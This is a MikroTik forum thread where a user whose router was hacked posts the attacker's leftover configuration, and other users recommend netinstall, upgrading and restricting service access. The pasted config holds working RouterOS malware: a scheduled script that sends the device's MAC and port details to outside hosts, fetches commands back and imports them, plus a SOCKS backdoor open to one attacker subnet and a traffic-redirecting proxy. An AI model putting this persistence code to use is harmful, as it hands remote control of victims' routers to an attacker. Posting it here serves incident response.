Community discussions

 
fitrah6
just joined
Topic Author
Posts: 1
Joined: Thu Sep 20, 2018 1:31 pm

Can't Upgrade router mikrotik because hacked

Thu Sep 20, 2018 1:38 pm

Hello guys,

My router was hacked, and now client from LAN network can't access some web (just some web, not at all). After remove configuration that configured by hacker, i try to upgrade the routeros version. And i can't upgrade routeros via /system packages and manual upload file .npk. How to fix this issue without netinstall, because the router is so far from my location.
This is the configuration that made by hacker :

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
/ip proxy
set anonymous=yes enabled=yes
/ip proxy access
add action=deny
/ip socks
set port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system scheduler
add interval=3m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=script4_ owner=userpolicy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name=iDDNS owner=userpolicy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=":global mac [/interface ethern\
et get 1 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\".[/interface pptp-server server get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:delay 3s\r\
\n/import dns;:delay 4s;/file remove dns"

Best Regards
Fitrah Ali Hudzaifah Sofyan
 
GREG3f
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Wed Dec 03, 2008 9:52 pm

Re: Can't Upgrade router mikrotik because hacked

Wed Oct 10, 2018 3:40 am

I have the same issue, did anyone find a solution other than netinstall?
 
R1CH
Forum Veteran
Forum Veteran
Posts: 828
Joined: Sun Oct 01, 2006 11:44 pm

Re: Can't Upgrade router mikrotik because hacked

Wed Oct 10, 2018 1:15 pm

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
 
Victoria168
just joined
Posts: 1
Joined: Fri Oct 19, 2018 2:35 pm

Re: Can't Upgrade router mikrotik because hacked

Fri Oct 19, 2018 2:37 pm

  • Did you update to the latest version?
  • Did you block access to your service ports, e.g. by address list or single subnet?
  • Or did you limit access to IP services ("Available from")?
APK Junkey
Last edited by Victoria168 on Mon Oct 22, 2018 8:02 am, edited 1 time in total.
 
sindy
Forum Guru
Forum Guru
Posts: 2640
Joined: Mon Dec 04, 2017 9:19 pm

Re: Can't Upgrade router mikrotik because hacked

Sat Oct 20, 2018 8:05 pm

@Victoria168, none of the correct hints you gave can help after the malware has already squatted at the machine. So as the things stand now, netinstall is the only way.
Instead of writing novels, post /export hide-sensitive. Use find&replace in your favourite text editor to systematically replace all occurrences of each public IP address potentially identifying you by a distinctive pattern such as my.public.ip.1.
 
User avatar
limbo
just joined
Posts: 5
Joined: Fri Jan 27, 2017 10:15 pm

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 7:08 pm

Although I'm not answering to the starting question, my device was hacked too and I was forced to use netinstall.

So my questions are:
How the intruder gained access in the first place?
What's the use of this hack (remote control, packet sniff, ddos attacks, bitcoin mining)?
How can I check if the device my devices timely if are secure or not? I discover it when winbox access was blocked.

Any tips?
 
User avatar
sebastia
Forum Guru
Forum Guru
Posts: 1292
Joined: Tue Oct 12, 2010 3:23 am
Location: Antwerp, BE

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 9:53 pm

There were a number of known bugs on versions up to and including 6.42. Some of these exploits could lead to low level system access, below what an administrator has access to.
Which version were you at?

Tips: follow security blog and upgrade...
 
anav
Forum Guru
Forum Guru
Posts: 2257
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Can't Upgrade router mikrotik because hacked

Fri Jan 11, 2019 10:00 pm

My understanding sebastia, is that the bugs were exploitable if basic security practices were not followed.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)

Who is online

Users browsing this forum: No registered users and 20 guests